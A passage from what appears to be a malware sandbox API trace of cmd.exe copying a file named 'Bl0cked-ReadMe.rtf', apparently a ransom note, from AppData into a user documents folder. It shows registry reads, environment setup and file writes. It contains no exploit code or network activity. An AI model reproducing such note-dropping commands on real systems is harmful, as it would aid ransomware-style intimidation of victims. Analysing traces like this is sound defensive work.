lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x40, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x1, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x0, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x4, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x4) returned 0x0 [0234.569] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee74, lpData=0x30ee78, lpcbData=0x30ee70*=0x1000 | out: lpType=0x30ee74*=0x0, lpData=0x30ee78*=0x9, lpcbData=0x30ee70*=0x1000) returned 0x2 [0234.569] RegCloseKey (hKey=0x40) returned 0x0 [0234.569] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.569] srand (_Seed=0x5b8863c2) [0234.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0234.569] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0234.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.570] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.570] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.570] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.570] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.570] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.570] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.570] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.570] GetEnvironmentStringsW () returned 0x4f22e8* [0234.570] FreeEnvironmentStringsW (penv=0x4f22e8) returned 1 [0234.570] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0234.570] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.570] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.570] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.570] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.570] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.571] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.571] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.571] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc38, lpFilePart=0x30fc34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc34*="Desktop") returned 0x18 [0234.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f9b4 | out: lpFindFileData=0x30f9b4) returned 0x4f0028 [0234.571] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0234.571] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.571] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.571] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.571] GetEnvironmentStringsW () returned 0x4f2b08* [0234.572] FreeEnvironmentStringsW (penv=0x4f2b08) returned 1 [0234.572] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.572] GetConsoleOutputCP () returned 0x1b5 [0234.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.572] GetUserDefaultLCID () returned 0x409 [0234.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.572] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd78, cchData=128 | out: lpLCData="0") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd78, cchData=128 | out: lpLCData="0") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd78, cchData=128 | out: lpLCData="1") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.573] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.573] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.574] GetConsoleTitleW (in: lpConsoleTitle=0x4e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.574] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.575] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.575] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.575] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.575] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.575] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.575] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.575] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.579] GetFileType (hFile=0x7) returned 0x2 [0234.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30fc70 | out: lpMode=0x30fc70) returned 1 [0234.579] _dup (_FileHandle=1) returned 3 [0234.580] _close (_FileHandle=1) returned 0 [0234.580] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.580] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30fc40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.580] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.580] GetConsoleTitleW (in: lpConsoleTitle=0x30fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.580] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.580] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.580] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.580] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x30f5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f5d4) returned 0x4e0e90 [0234.581] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.581] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.582] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e4e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.582] 
_open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] GetFileType (hFile=0x54) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30e538 | out: lpFileSizeHigh=0x30e538*=0x0) returned 0x1632 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.582] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] GetFileType (hFile=0x4c) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] GetFileType (hFile=0x4c) returned 0x1 [0234.582] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.582] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, 
lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] GetFileType (hFile=0x4c) returned 0x1 [0234.583] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.583] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.584] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.584] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.584] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 
0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.585] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] GetFileType (hFile=0x4c) returned 0x1 [0234.585] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.585] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) 
returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.586] GetFileType (hFile=0x4c) returned 0x1 [0234.586] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] GetFileType (hFile=0x4c) returned 0x1 [0234.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.709] WriteFile (in: hFile=0x4c, lpBuffer=0x30f500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f500*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f550*, lpNumberOfBytesWritten=0x30e554*=0x20, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e540 | out: lpNewFilePointer=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.710] ReadFile (in: hFile=0x54, lpBuffer=0x30f370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e560, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesRead=0x30e560*=0x200, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f370*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f3c0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f410*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f410*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] WriteFile (in: hFile=0x4c, lpBuffer=0x30f460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f460*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.710] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile (in: hFile=0x4c, lpBuffer=0x30f4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e554, lpOverlapped=0x0 | out: lpBuffer=0x30f4b0*, lpNumberOfBytesWritten=0x30e554*=0x50, lpOverlapped=0x0) returned 1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] GetFileType (hFile=0x4c) returned 0x1 [0234.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.711] WriteFile 